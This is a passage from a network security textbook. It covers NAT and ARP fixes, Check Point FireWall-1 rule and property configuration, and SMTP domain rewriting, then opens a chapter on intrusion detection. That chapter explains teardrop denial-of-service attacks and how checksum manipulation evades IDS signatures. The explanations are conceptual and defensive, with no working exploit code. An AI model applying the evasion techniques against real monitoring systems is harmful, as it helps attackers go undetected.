the MAC address of 192.168.1.1 (its default gateway setting) and \nforward this first packet to the firewall. \nYour firewall reviews the NAT table and realizes that this host address needs to be statically mapped. The firewall \nthen changes the source IP address to 206.121.73.10, and ARP for its default gateway setting, which is the \nEthernet interface of the router (206.121.73.1). The firewall then transmits this initial connection request. This \nprocess is shown in Figure 7.12. \n" }, { "page_number": 159, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 159\n \nFigure 7.12: An initial session request from the mail relay \nThrough the magic of the Internet, this initial packet of data is routed to the destination host. Let’s assume that the \nremote host is in fact a mail system and that your connection request is accepted. The remote host creates an IP \nheader using its IP address as the source address (192.52.71.4) and the legal IP address of your mail system as the \ndestination IP address (206.121.73.10). The mail system sets SYN=1 and ACK=1 to acknowledge your request to \nestablish a new session. Let’s assume that this reply makes it all the way back to your router without error. \nAt this point, an interesting problem arises. Your router receives this acknowledgment in its WAN port and \nconsults its routing table. The router realizes that the 206.121.73.0 network is directly connected to its Ethernet \nport. Not realizing that this system is on the other side of the firewall, it attempts local delivery by transmitting an \nARP to 206.121.73.10. Since no actual system is using this address, the ARP request fails. The router assumes that \nthe host is down and returns an error to the remote mail system. \nHow do you get around this ARP problem and get the router to deliver the reply directly to the firewall? Luckily, \nyou have a few options available to remedy this situation. \nFixing ARP at the Router \nIf the router supports static ARP entries, you could create a phony entry on the router that maps the MAC address \nof the firewall’s external interface to the IP address you are translating. When the firewall receives a packet for \n206.121.73.10, it will no longer need to transmit an ARP broadcast. The router would consult its ARP cache, find \nthe static entry you created, and deliver the packet directly to the firewall. \nIf the router is a Cisco, you could create this entry with the following command in global configuration mode: \narp {ip address} {hardware address} \nTip \nTo find the external MAC address of the firewall, you can ping the firewall’s external \naddress and then view the ARP cache entry on the router. This will display the MAC \naddress entry in the format the router expects you to use when creating the static entry. \nNot all routers support the creation of static ARP entries. If you are stuck using one of these routers, you will have \nto try one of the other options that follow. The only drawback to configuring static ARP entries on the router is \nthat if you have multiple devices on the segment between the firewall and the router (such as other routers or an \nunprotected server), each device will need a static ARP entry in order to reach this translated address. \nFixing ARP at the Firewall \nYou can also fix this problem on the firewall by telling the NT server to respond to an ARP request for the \ntranslated address when it sees one. This is referred to as proxy ARP and is a common feature on UNIX platforms. \nUnfortunately, NT has no built-in method for performing proxy ARP for other IP addresses. Fortunately, we can \nconfigure proxy ARP through the FireWall-1 software. \nNote \nMost UNIX machines support static ARP entries with a -p switch. This switch tells the \nUNIX machine to \"publish,\" or act as a proxy for, the specified IP address. If your \nfirewall is running on UNIX, this will fix the ARP problem with NAT addresses. \n" }, { "page_number": 160, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 160\nTo our ARP problem, you will need to create a file in the \\%fw1%\\state directory. Name the file local.arp. In this \nfile, create one entry per line that associates each statically mapped IP address with the MAC address of the \nfirewall’s external interface. The format of each line should be \n206.121.73.10 00-00-0C-34-A5-27 \nOnce you have rebooted the system, the firewall will begin responding to ARP requests for the listed entries. \nNote \nThe only drawback to this method is that it does not work consistently if you \ncreate 10 or more entries. How often the system replies will depend on how busy \nit is at the time. If you have many IP addresses that will need to be translated, you \nshould look at fixing proxy ARP for NT through one of the other listed methods. \nFixing ARP through Routing Changes \nOf course, the easiest way to fix ARP for NAT addresses would be to make sure that ARP is never an issue. You \ncan do this by changing your subnet address scheme and your routing tables so that the router no longer thinks that \nthe static NAT address is local. \nFor example, let’s say that you went back to your ISP and asked it to issue you a new legal subnet address, in \naddition to the one already supplied. Instead of asking for a full class C address space, you ask for one that uses a \n255.255.255.252 subnet mask. Most ISPs will be receptive to this request, because it only supports two hosts and \nISPs usually have address space broken down into this increment for use on point-to-point WAN links. \nTip \nIf your ISP will not issue you additional address space, you can subnet the address space \nyou have already received. \nOnce you have obtained this address space, use it to address the network between the router and the firewall. For \nexample, if your ISP issued you the network address 206.121.50.64, you could use 206.121.50.65 for the Ethernet \ninterface on the router and 206.121.50.66 for the external interface on the firewall. You would then need to create \na route entry on the router, telling it that the best route to the 206.121.73.0 network is through the firewall’s \nexternal interface (206.121.50.66). \nTip \nRemember that if you change the external IP address on the firewall, you will need \nto generate a new license key. \nSo your router no longer thinks it is local to your statically mapped addresses and will no longer send an ARP \nrequest for this address when attempting delivery. The router will defer to its routing table and realize that this is \nnot a local host, so it must transmit the packet to the next hop, which is the firewall. \nWorking with the FireWall-1 Rules \nNow that you have created your required network objects, it is time to employ them in your firewall rules and \nimplement your security policy. A sample policy is shown in Figure 7.13. \n \nFigure 7.13: Sample FireWall-1 rules \nThe rules read from left to right. For example, Rule 4 states, “Any IP host connecting to the system web_server on \nport 80 should be allowed through the firewall.\" Port 80 is the well-known port for HTTP. Remember that \nFireWall-1 is simply going to screen the packet headers. It has no way to know for sure if the remote system is \nactually transmitting HTTP requests. The service column employs service names, instead of port numbers, for \nimproved ease of use. Here’s a description of each column: \nNo. Identifies each rule by number in order to provide a reference \n" }, { "page_number": 161, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 161\nSource Identifies the source hosts or networks affected by this rule \nDestination Identifies the destination hosts or networks affected by this rule \nService Identifies the service port numbers affected by this rule \nAction Determines what should be done with a packet if the source, destination, and service are a \nmatch. Options are \nƒ \nAccept Lets it through \nDrop Discards the packet with no notification to the source \nReject Sends an RST=1 packet to the source \nUser Auth Invokes User Authentication for the connection \nClient Auth Invokes Client Authentication for the connection \nSession Auth Invokes Session Authentication for the connection \nEncrypt Encrypts outgoing packets, accepts and decrypts incoming packets \nClient Encrypt Accepts only SecuRemote (Check Point’s VPN client) communications \nTrack Determines what should be done when this rule finds a match. Options are \nƒ \nIgnore Not represented by an icon, leaving Track blank does not create a log \nentry \nShort log entry Records the source IP address and destination IP and port address \nLong log entry Records the short entries plus source port and packet size \nAccount Writes entry to an accounting log \nAlert Takes special predefined action \nMail Sends an e-mail which includes the log entry \nSNMP Trap Issues an SNMP trap (defined in SNMP Trap Alert field on the Log and \nAlert tab of the Properties Setup Window) \nUser defined Performs a user-customizable action \nInstall On Defines on which systems the rule entry should be enforced. The default is \nGateways, which includes all NetworkObjects defined as Gateways. You can also selectively \ninstall each rule on: \nƒ \nDst Represents inbound traffic on Network Objects defined as Destination \n(usually servers) \n" }, { "page_number": 162, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 162\nSrc Similar to Dst, but represents outbound traffic (that is client-initiated) \nRouters Rules are enforced on all routers \nIntegrated FireWalls Rules are enforced on all integrated FireWalls \nTargets Rules are applied to a specific target, on both in and outbound traffic (called \neitherbound by Check Point) \nTime Determines what time of day, day of the week, or day of the month this rule should be \nenforced. For example, if Time on rule 3 were changed to read 5:00 PM to 8:00 AM, users could \nonly access the Internet during non-business hours. A new Group object can also be created that \ncan hold multiple Time objects, which are applied collectively (as the Group) to a particular \nrule. \nComments Allows you to add text describing the purpose of the rule. (This column is only \npartially shown in Figure 7.13.) \nUnderstanding the Rule Set \nLet’s look briefly at each of the rules shown in Figure 7.13. Feel free to adapt these rules to your environment as \nyou see fit. \nRule 1 tells the firewall to drop, but not log, all NetBIOS traffic originating from the internal network. Windows \nmachines broadcast name information once per minute. These entries can quickly fill up your log and make it \ndifficult to weed out the information you are actually interested in. When you leave the Track column blank, the \nlog does not record this traffic. \nRule 2 is used to block any services that you absolutely do not want to let past your firewall. This can be used to \nminimize the effects of a break-in. For example, let’s say that your Web server is attacked and compromised. The \nattacker may try to transmit SNMP information to a remote location in order to gain additional information on the \ninternal environment. Since most organizations typically have a fairly loose policy regarding Internet access, this \ninformation would be allowed to leave the network. Rule 2 not only blocks this traffic, it also notifies the \nadministrator that something fishy is going on. \nRule 3 lets your internal systems perform any type of communication they desire, except for services blocked by \nearlier rules. Like a router access list, FireWall-1 processes rules in order so traffic is evaluated on a first fit basis, \nnot a best fit basis. \nRules 4 and 5 allow in acceptable traffic to your Web server and mail relay, respectively. Because these systems \nare located on an isolated DMZ, Rule 6 is required to let your mail relay deliver SMTP messages to your internal \nmail system. When this rule is combined with Rule 7, no other traffic is permitted from the DMZ to the internal \nnetwork. Again, this helps to protect your internal systems if one of your public servers becomes compromised. \nRule 8 is then used to allow your mail relay to deliver messages to hosts out on the Internet. \nRule 9 looks for suspicious activity: specifically, for traffic trying to connect to TCP echo and/or the Character \nGenerator service. These services have many known exploits. None of your internal systems actually offers these \nservices. Rule 9 is set up specifically to see if someone is probing your network, perhaps with a scanner. If such \ntraffic is detected, you want the firewall to take additional action beyond simply creating a log entry. So why not \nmonitor all unused ports? If the attacker is using a port scanner, this rule may be evaluated hundreds—even \nthousands—of times. The last thing you want is to cause a denial of service on your mail system as the firewall \ntries to warn you of an attack in progress (kind of defeats the whole purpose, doesn’t it?). \nRule 10 is your implicit denial. This rules states, “Deny all traffic that does not fit neatly into one of the above-\nmentioned rules.” \nModifying the Rules \nTo add a row and create a new rule entry, select the Edit menu option. Each new row will be created with the \ndefault rule: “Deny all traffic.” To change the parameters, simply right-click in each box and select Add. \n" }, { "page_number": 163, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 163\nTo change the Source entry for a rule, for example, you would simply right-click in the Source box and select Add \nfrom the drop-down menu. You would then see a list of valid objects you could add to specify the source \nparameter for this new rule. Continue this process until you have created all the rules required to implement your \nsecurity policy. \nModifying the Firewall Properties \nThe rule base is not the only place where you need to configure traffic parameters. You also need to modify the \nproperties of the firewall itself. To do this, select Policy ¾ Properties from the Security Policy-1 menu. The \nProperties Setup screen is shown in Figure 7.14. \n \nFigure 7.14: The Properties Setup screen \nNote \nThis screen is a bit disturbing, as it defines traffic that should be processed outside of the \nrule base. In other words, this screen defines services that should be processed even if \nthey have not been specifically defined within the Rule Base Editor. \nNotice that the Accept RIP option is not selected by default. This option tells the firewall, “Accept RIP traffic \nbefore you even process the rule base.” Even if you do not have a rule telling the firewall to accept RIP updates, \nthe firewall will do so, anyway. If Woolly Attacker knows you are using FireWall-1, he may attempt to transmit \nfalse RIP updates to your firewall in an effort to corrupt your routing table. This is another one of the reasons that \nstatic routing should be used whenever possible. \nThere are also services that you can enable or disable on other Properties Setup tabs, as well. Make sure you check \nthe Services and Access Lists tab to insure that they match your access control policy. \nWhen Properties Are Processed \nThis is a major security hole if you do not configure these properties to match your security policy. You can \nspecify when to process each of these properties by using these settings: \nƒ First Accept this traffic before processing the rule base. \nƒ Before Last Accept this traffic, unless the rule base specifically blocks it from taking \nplace. \nƒ Last Process this traffic after the last rule in the rule base. If it is not specifically \nblocked, let it pass. If the last rule is “Drop all traffic from any source to any \ndestination,” this property is not evaluated. \nSo why this major lapse in security? As with many things in life, security was compromised in an effort to make \nthe firewall easier to use, appealing to the lowest common denominator. For example, the firewall administrator \nmay not be able to figure out that she needs to accept RIP traffic in order to process route updates. The \nadministrator may be a little slow on the uptake and not realize that she needs to pass DNS queries in order to \nallow internal systems to resolve host names to IP addresses. These properties are enabled by default in order to \ncover for this kind of mistake. Rather than improving consumer education, companies compensate by decreasing \nthe level of security their products offer. \n" }, { "page_number": 164, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 164\n \nThe SYNDefender Tab \nThe final Properties Setup tab you should evaluate is the SYNDefender tab. SYNDefender allows the firewall to \nprotect internal systems from SYN-based attacks. \nYou may remember from our discussion of TCP-based communications in Chapter 3 that two hosts will exchange \na TCP handshake before initializing the session. During this handshake \n1. Source sends a packet to the destination with SYN=1. \n2. Destination replies to source with SYN=1, ACK=1. \n3. Source sends a packet to the destination with ACK=1. \n4. Source starts transmitting data. \nNote \nA TCP host uses two separate communication queues: a small one for sessions that still \nhave the TCP handshake taking place, and a larger one for sessions that have been fully \nestablished. It is the smaller queue that is the target of a SYN attack. \nWhen the destination host receives the first SYN=1 packet, it stores this connection request in a small “in process” \nqueue. Since sessions tend to be established rather quickly, this queue is small and only able to store a relatively \nlow number of connection requests. This was done for memory optimization, in the belief that the session would \nbe moved to the larger queue rather quickly, thus making room for more connection requests. \nA SYN attack floods this smaller queue with connection requests. When the destination system issues a reply, the \nattacking system does not respond. This leaves the connection request in the smaller queue until the timer expires \nand the entry is purged. By filling up this queue with bogus connection requests, the attacking system can prevent \nthe system from accepting legitimate connection requests. Thus a SYN attack is considered a denial of service. \nThe SYNDefender tab offers two ways to combat this problem. You can configure the firewall to act as \nƒ \nA passive SYN gateway \nƒ \nA SYN gateway \nAs a passive SYN gateway, the firewall queues inbound connection requests and spoofs the reply SYN=1, ACK=1 \npacket back to the transmitting host. This prevents the connection request from ever reaching the internal system. \nIf a proper ACK=1 is received from the transmitting system, the firewall then handshakes with the internal system \nand begins passing traffic between the two hosts. In effect, the firewall is acting like a SYN proxy. \nThe only drawback to this method is that it adds a slight delay to the initial session establishment. It also adds a lot \nmore processing on the firewall as it attempts to mediate all of these connection requests. For example, a Web \nbrowser will create multiple sessions when it downloads a Web page. A separate session is established for each \ngraphic, piece of text, or icon. Most popular Web sites will create a minimum of 50 sessions, and some graphically \nrich sites will top 300 simultaneous connections. As an added protection, the passive SYN gateway allows you to \nspecify a timeout (the default is 10 seconds) and the Maximum Sessions allowed (the default is 5000). \nThe other option is to set up the firewall as a SYN gateway. In this mode, the firewall lets the SYN=1 request and \nthe SYN=1, ACK=1 reply simply pass through the firewall. At this point, however, the firewall will spoof an \nACK=1 back into the internal system in order to complete the connection request and move the session to the \nlarger queue. When the remote system responds with an ACK=1 of its own, the firewall blocks this one packet but \nallows the rest of the session to take place normally. \nIf the remote host does not reply within a configurable amount of time, the firewall will send an RST=1 to the \ninternal system, thus terminating the session. The only problem here is that you may end up creating sessions on \nthe internal system that are not required if an attack is taking place. This is typically not a problem, because the \nactive session queue is in a far better position to handle multiple sessions then the connection queue would be. \nThis method also helps to remove the establishment delay caused by the SYN relay method. \nWorking with Security Servers \nSecurity servers allow the firewall to proxy connections for a specific service, allowing for better traffic control: \nyou can now make decisions based on payload content. This is useful when you want to make filtering decisions \nbased on the content of the data rather than on the service being used. \nFor example, let’s assume that you have three different domain names registered with the InterNIC: foobar.com, \nfubar.com, and bofh.com. Foobar.com is the primary domain name, but you want to receive mail for all three \n" }, { "page_number": 165, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 165\ndomains. This applies to every user: mail for ftuttle@foobar.com, ftuttle@fubar.com, and \nftuttle@bofh.com should all be routed to the same person. Outbound mail, however, should always appear \nto originate from the foobar.com domain. \nIf you try to configure your mail server to handle multiple domains, you might be in for a lot of work. Many mail \nsystems would require you to configure three different mail addresses for each user. Typically, the first one would \nbe automatically created (such as ftuttle@foobar.com), and you would have to manually create an e-mail \nalias for the other two entries (ftuttle@fubar.com and ftuttle@bofh.com). These additional aliases \nwould increase administration time and introduce the possibility of errors through typing mistakes or missing \nentries. \nIf you were really unlucky, your mail system might not even have the ability to host multiple mail domains. This \nis especially true of older mail servers. As mail administrator, you are only allowed to configure a single mail \ndomain on these older mail servers. This would cause mail addressed to the additional domains to be rejected. \nA simpler solution would be to configure the SMTP security server so that you can screen inbound mail for the \ndestination domain name. If the domain name fubar.com or bofh.com was detected, you could have the security \nserver replace either with the domain name foobar.com. Mail that is addressed to foobar.com would be allowed \nthrough without alteration. This would mean that all inbound mail messages reaching your mail server would \nalways have a destination domain address of foobar.com. Since your mail server only sees a single domain name, \nyou won’t have to create alias e-mail addresses for each user. \nConfiguring the SMTP Security Server \nIn order to use the SMTP security server, you first need to enable it through the FireWall-1 Configuration utility. \nWe discussed how to enable this server in the section on the FireWall-1 Configuration utility and even showed this \nfeature enabled in Figure 7.5. Once the SMTP security server is enabled, you will need to define SMTP resources \nwith the Security Policy-1 tab. \nFor the main menu of the Security Policy-1 tab, select Manage ¾ Resources. This will produce the Resource \nManagement screen. If this is the first time you have run the Resource Manager, it will contain no entries. Click \nNew and select SMTP. You should now be looking at the SMTP Definition box, as shown in Figure 7.15. \n \nFigure 7.15: The SMTP Definition box General tab \nStart by configuring the resource to handle inbound mail that has been sent to foobar.com. You could use a \ndescriptive name, such as inbound_foobar, so that this definition would be easy to recognize once it has been \nadded to the security policy. Within the mail server field, enter the IP address of the mail server to which you want \nto forward mail. (Use the IP address to expedite mail delivery: the firewall does not have to resolve the host \nname.) Within the Error Handling Server field, enter the IP address of the mail system to which you want to \nforward error messages. This can be the same IP address you defined in the Mail Server field. \nException tracking defines whether you wish to log all e-mail messages that this resource processes. You also \nhave the option of sending an alert. Finally, you have the option to select the Notify Sender On Error check box. If \nthe resource matches an inbound mail message, but the security server is unable to deliver the message, checking \nthis box means an error message will be returned to the original sender. \nYou can now configure the Match tab, as shown in Figure 7.16. \n" }, { "page_number": 166, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 166\n \nFigure 7.16: The Match tab of the SMTP Definition box \nThe configuration of the Match tab is pretty straightforward. Enter the text you wish this resource to match within \neither the Sender or the Recipient field. An asterisk (*) acts as a wildcard and will match any character string. \nNote that you have told the resource to match any sender, but the Recipient field within the e-mail message must \nend in @foobar.com. This will match all inbound mail for the foobar.com domain. \nSince you are not looking to rewrite any of your e-mail headers, you are done configuring this particular resource. \nSimply click OK to save this entry. \nYou must now create entries for the domains you wish to alias. From the Resource Management screen, again \nclick New and select SMTP. This will create a new SMTP Definition box, like the one shown in Figure 7.17. \nSelect the General tab and give this resource a descriptive name (such as inbound-fubar.com). Since mail \naddressed to fubar.com will be delivered to the same mail system as foobar.com, enter the same Mail Server and \nError Handling Server IP address that you used for the foobar.com entry. \nUnder the Match tab, you will again use an asterisk to pattern match the Sender field, but the Recipient field will \ncontain the entry *@fubar.com. This will allow you to pattern-match inbound e-mail addresses sent to this \nalternative domain name. Since this is one of the domain names that you want to rewrite, you must modify the \nAction1 tab, shown in Figure 7.17. \n \nFigure 7.17: The Action1 tab of the SMTP Definition box \nThe only fields you need to fill in on the Action1 tab are the fields you wish to have rewritten. Any field left blank \nwill remain untouched. The fields on the left attempt to match text within the specified portion of the e-mail \nheader. The fields on the right contain what this text should be changed to if a pattern match occurs. \nThe first Recipient field contains the character string *@fubar.com. This is the portion of the address that you \nwant to rewrite. The right-hand Recipient field contains the character string &@foobar.com. The ampersand (&) \ntells the resource, \"Copy the value of the asterisk in the previous field and paste it here.\" This allows you to \nmaintain the same user name in your new recipient header. The remaining text simply tells the resource to replace \nfubar.com with foobar.com. \nThis completes the configuration of the SMTP resource for inbound fubar.com mail. You can click OK and return \nto the Resource Management screen. You also need to create an SMTP resource for bofh.com. Follow the same \nsteps you took for the fubar.com resource, but replace the name and pattern match information with bofh.com. \nOnce you have finished, you can close the Resource Management screen and return to the Security Policy-1 tab in \norder to incorporate these resources into your security policy. \nFigure 7.18 shows your SMTP resources added to a very simple security policy. Row 1 blocks all traffic that you \ndo not want passing the firewall in either direction. Row 2 defines a very loose security policy, which allows all \ninternal systems to access any services located on the Internet (except for those explicitly dropped in row 1). \n" }, { "page_number": 167, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 167\n \nFigure 7.18: A security policy using SMTP resources \nRow 3 is the entry which includes the SMTP resources. The rule states that any system can connect to Skylar (the \nfirewall) and attempt to deliver SMTP messages. All SMTP messages will then be processed by the three SMTP \nresources you created. Each resource was added to this rule by right-clicking in row 3’s Service box and selecting \nAdd With Resource ¾ SMTP, then selecting the name of the resource, which is shown in the Resource drop-down \nlist. \nSince your mail server has full Internet access per row 2, you do not need to configure an outbound SMTP \nresource. The mail system should be fully capable of delivering all outbound mail directly. \nTip \nA side benefit of the current rule base is that it prevents your mail systems from being used \nas spam relays. The firewall will only accept messages going to one of your three domains. \nThe internal mail system cannot be reached directly from the Internet. This means that \nneither of your mail systems could be used by a spammer to relay advertisements to \nmultiple recipients. \nInstalling the Rules \nOnce you have configured the firewall to reflect your security policy, you should save your settings. You should \nalways do a File ¾ Save As from the Security Policy-1 tab menu in order to create a unique policy name. This will \nprovide you with some revision control in case you later need to restore an older policy. \nYou now need to install this policy on the firewall in order to activate your changes. Select Policy ¾ Install from \nthe Security Policy-1 tab menu. This will produce a dialog box that displays all the hosts where your firewall \npolicy will be installed. At a minimum, you should see the object for your firewall. If you are managing multiple \nfirewalls, or if you will be installing access control lists on specific routers, these devices should appear in this \ndialog box, as well. When you have verified the information, click OK to install your policy on the selected hosts. \nThis will bring up the Install Security Policy dialog box shown in Figure 7.19. The information in this dialog box \nshould report that a policy script was compiled without errors and that it was installed successfully to the firewall. \nIf no errors occurred, click Close. Your firewall should be ready for use. \n \nFigure 7.19: The Install Security Policy dialog box \nIf errors were reported, look at the error messages closely. Typically, errors are due to conflicts in the rules. For \nexample, you may have created one rule stating that a particular system has full Internet access, only to later \ndefine that the same system is not allowed to use FTP. \n" }, { "page_number": 168, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 168\nWhen you install your rule base, the firewall first checks that there are no conflicts. If you wish to verify that there \nare no rule conflicts before you attempt to install your rules, you can select the Policy ¾ Verify option instead. In \nmy experience, however, this check is not exhaustive. It is possible for a rule set to pass the Verify check, only to \nshow problems during installation. \n \nSummary \nThis completes our review of Check Point FireWall-1. In this chapter, you saw why FireWall-1 is \none of the most popular firewalling products and became aware of a number of caveats. You also \nwent through the installation and setup procedure on a Windows NT server. You should now have \na good idea of how to deploy this product within your network environment. \nIn the next chapter, we will evaluate methods of controlling security within your network perimeters. \nWe will look at intrusion detection systems that can be combined with a firewall solution to produce \nan extremely secure environment. \n \nChapter 8: Intrusion Detection Systems \nIntrusion detection systems (IDS) (as a generic term) represent a fairly new technology that has \nbeen receiving a lot of recent press. While the technology is only three or four years old, it brings \nvendors’ promises of revolutionizing the network security market. In fact, one vendor has ventured \nto say that its IDS completely removes the need for a firewall. Clearly, someone in marketing must \nbe writing this company’s technical documents, because IDS is a way to augment—not replace—\nyour existing security mechanisms. \nThe FAQs about IDS \nTo understand an intrusion detection system, think about having one or more network protocol \nexperts (affectionately known as “bit weenies”) armed with a network analyzer and watching \npassing traffic. These specialists know about all the latest exploits that an attacker may \nattempt to launch, and they diligently check every packet to see if any suspicious traffic is \npassing on the wire. If they find suspicious traffic, they immediately contact the network \nadministrator and inform her of their findings. \nTake out the human element from this scenario, and you have an intrusion detection system. \nAn IDS captures all passing traffic on the network, just like a network analyzer. Once this \ninformation has been read into memory, the system compares the packets to a number of \nknown attack patterns. For example, if the IDS notices that a particular host is repeatedly \nsending SYN packets to another host without ever attempting to complete the connection, the \nIDS would identify this as a SYN attack and take appropriate action. A good IDS may have \nwell over 100 attack patterns saved in its database. \nThe action taken depends on the particular IDS system you are using and how you have it \nconfigured. All IDS systems are capable of logging suspicious events. Some will even save a \nraw packet capture of the traffic so that it can be analyzed later by the network administrator. \nOthers can be configured to send out an alert, such as an e-mail message or a page. Many \nIDS systems can attempt to interfere with the suspicious transmission by resetting both ends \nof the connection. Finally, there are a few that can interact with a firewall or router in order to \nmodify the filter rules and block the attacking host. The benefits and drawbacks to each of \nthese actions will be discussed in detail later in this chapter. \nAn IDS has traditionally been broken up into two parts: \nƒ The sensor, which is responsible for capturing and analyzing the traffic \nƒ The console, from which the sensor can be managed and all reports are run \nIntrusion detection systems are extreme resource hogs. Vendors typically recommend that \nyou run the sensor on a dedicated system with 256MB of RAM and an Intel 300MHz Pentium \n" }, { "page_number": 169, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 169\nIII or Pro processor (or RISC equivalent if the sensor is running on UNIX). Since an IDS logs \nall traffic, copious amounts of disk space are required for its databases. While about 100MB of \ndisk space is usually recommended, plan on using a whole lot more unless you will frequently \npurge the database or your network sees very little traffic. The requirements for the dedicated \nsystem running the console are about the same, except you must reserve enough disk space \nto store a copy of each sensor’s database. \n \nIDS Limitations \nSo far, an IDS sounds like a wonderful security device—but these systems are not perfect and do have their \nlimitations. In fact, the authors of a popular column in the trade magazine Infoworld declared IDS dead at the end \nof the year 2000 because of switched network technologies, imperfect one-size-fits-all attack signatures, high-\nvolume network traffic overloading IDS systems, and encrypted network data hiding pertinent attack information \nfrom the IDS system, while leaving Web servers vulnerable. Many times IDS systems simply cannot respond in \ntime to prevent an attack. Let’s look at a common denial of service (DoS) attack to see how this can occur. \nTeardrop Attacks \nIn order to understand how a teardrop attack is used against a system, you must first understand the purpose of the \nfragmentation offset field and the length field within the IP header. A decode of an IP header is shown in Figure \n8.1. The fragmentation offset field is typically used by routers. If a router receives a packet that is too large for the \nnext segment, the router will need to fragment the data before passing it along. The fragmentation offset field is \nused along with the length field so that the receiving system can reassemble the datagram in the correct order. \nWhen a fragmentation offset value of 0 is received, the receiving system assumes either that this is the first packet \nof fragmented information or that fragmentation has not been used. \n \nFigure 8.1: A decode of an IP header \nIf fragmentation has occurred, the receiving system will use the offset to determine where the data within each \npacket should be placed when rebuilding the datagram. For an analogy, think of a child’s set of numbered building \nblocks. As long as the child follows the numbering plan and puts the blocks together in the right order, he can \nbuild a house, a car, or even a plane. In fact, he does not even need to know what he is trying to build. He simply \nhas to assemble the blocks in the specified order. \nThe IP fragmentation offset works in much the same manner. The offset tells the receiving system how far away \nfrom the front of the datagram the included payload should be placed. If all goes well, this schema allows the \ndatagram to be reassembled in the correct order. The length field is used as a verification check to insure that there \nis no overlap and that data has not been corrupted in transit. For example, if you place fragments 1 and 3 within \nthe datagram and then try to place fragment 2, but you find that fragment 2 is too large and will overwrite some of \nfragment 3, you know you have a problem. \nAt this point, the system will try to realign the datagrams to see if it can make them fit. If it cannot, the receiving \nsystem will send out a request that the data be resent. Most IP stacks are capable of dealing with overlaps or \npayloads that are too large for their segment. \nLaunching a Teardrop Attack \nA teardrop attack starts by sending a normal packet of data with a normal-size payload and a fragmentation offset \nof 0. From the initial packet of data, a teardrop attack is indistinguishable from a normal data transfer. Subsequent \n" }, { "page_number": 170, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 170\npackets, however, have modified fragmentation offset and length fields. This ensuing traffic is responsible for \ncrashing the target system. \nWhen the second packet of data is received, the fragmentation offset is consulted to see where within the datagram \nthis information should be placed. In a teardrop attack, the offset on the second packet claims that this information \nshould be placed somewhere within the first fragment. When the payload field is checked, the receiving system \nfinds that this data is not even large enough to extend past the end of the first fragment. In other words, this second \nfragment does not overlap the first fragment; it is actually fully contained inside of it. Since this was not an error \ncondition that anyone expected, there is no routine to handle it and this information causes a buffer overflow—\ncrashing the receiving system. For some operating systems, only one malformed packet is required. Others will not \ncrash unless multiple malformed packets are received. \nIDS versus Teardrop \nHow would a typical IDS deal with this attack? When the teardrop attack is launched, the initial packet resembles \na normal data transfer. From just looking at this first packet of information, an IDS has no way of knowing that an \nattack is about to occur. \nWhen the second packet is transmitted, the IDS would be able to put together the datagram fragments and identify \nthat this is a classic example of a teardrop attack. Your IDS could then alert the networking staff and take \npreventive measures to stop the attack. \nYou only have one tiny little problem: if your attacker was lucky enough to identify an operating system that will \ncrash with only one malformed packet, it is too late to prevent the attack from occurring. While it is true that your \nnetworking staff will have the benefit of knowing that their server has just crashed, they have probably already \nfigured that out from the number of calls from irate users. \nSo while your intrusion detection system was able to tell you why the server crashed, it was unable to prevent the \nattack from occurring in the first place. In order to prevent future occurrences, you would need to patch the system \nbefore an attacker strikes again. \nWhy not simply block the attacking IP address? Your attacker is probably savvy enough to use IP spoofing, \nmaking it look like the attack came from somewhere other than his or her real IP address. Unless your IDS is on \nthe same collision domain as the attacking system, it will be unable to detect that a spoofed address is being used. \nThis means that your attacker could continue to randomly change the source IP address and launch successful \nattacks. \nOther Known IDS Limitations \nIn February 1998, Secure Networks, Inc. released a white paper about testing it had performed on a number of \nintrusion detection systems. This testing discovered a number of vulnerabilities in IDS that would allow an \nattacker to launch an attack and go completely undetected. \nWhile some of the conclusions of the study are a bit melodramatic, the actual testing raises some valid points. In \nshort, the study focused on two problem areas: IDS detection of manipulated data and direct attacks on the IDS \nitself. The conclusion of the study was that sniffer-based intrusion detection would never be capable of reliably \ndetecting attacks. \nData Manipulation \nThis conclusion was based on the fact that virtually none of the intrusion detection systems in the study \nreassembled the IP packets in an identical manner to systems communicating via IP. This resulted in some \ninconsistencies between what the IDS perceived was occurring within the packet stream and what the receiving \nsystem was able to process. \nOne of the problems was that some of the intrusion detection systems did not verify the checksum field with the IP \nheader (refer to Figure 8.1). This would most certainly be done by the receiving system, and manipulating this \nfield would cause the IDS to record a different payload than the receiving system would process. \nThe example cited in the study was the PHF CGI attack. An IDS would attempt to detect this attack by looking for \nthe character string phf within the payload portion of all HTTP requests. If this pattern was detected, the IDS \nwould assume that this attack was taking place. A savvy attacker could attempt to send a series of packets, each \nwith one character that produced the string phoof. The attacker could then manipulate the checksum field so that \neach packet that contained the letter o had an invalid checksum. The result would be that while the receiving \n" }, { "page_number": 171, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 171\nsystem (which would verify the checksum) would only process the character string phf, the IDS (which does not \nverify the checksum) would read this transmission as phoof. \nWhile this inconsistency in how traffic is processed is certainly a valid concern, it is not insurmountable. For \nexample ISS RealSecure, one of the packages that exhibited this problem, was fixed by the next product release. \nSuch problems are typical in an infant technology. Firewall vendors have gone through a similar learning process \nand continue to make improvements even today. There is no reason to assume that network security will ever \nbecome a stagnant field. \nAttacks against the IDS \nAnother issue raised by the Secure Networks study was the vulnerability of the IDS to direct attacks. This is a \nvalid concern, because a direct attack against the IDS may inhibit its ability to detect intrusions. By shutting down \nthe IDS, an attacker could launch an attack against the network without fear of detection. \nIDS versus Firewall \nThis highlights a major difference between a firewall and an IDS. A firewall acts as a perimeter guard. This means \nthat all traffic must pass through it in order to move from one section of a network to another. If the firewall is \nattacked and services are disrupted, it will typically fail open, meaning that it will be unable to pass traffic. While \nthis disrupts all transmissions, it prevents an attacker from disabling the firewall and using this opportunity to \nlaunch an attack on an internal host. \nAn IDS, on the other hand, does not sit between network segments. It is designed to run unobtrusively within a \nsingle collision domain. If the IDS is disabled, it technically fails closed because traffic flow is not disrupted. An \nattacker may be able to disable the IDS while still gaining 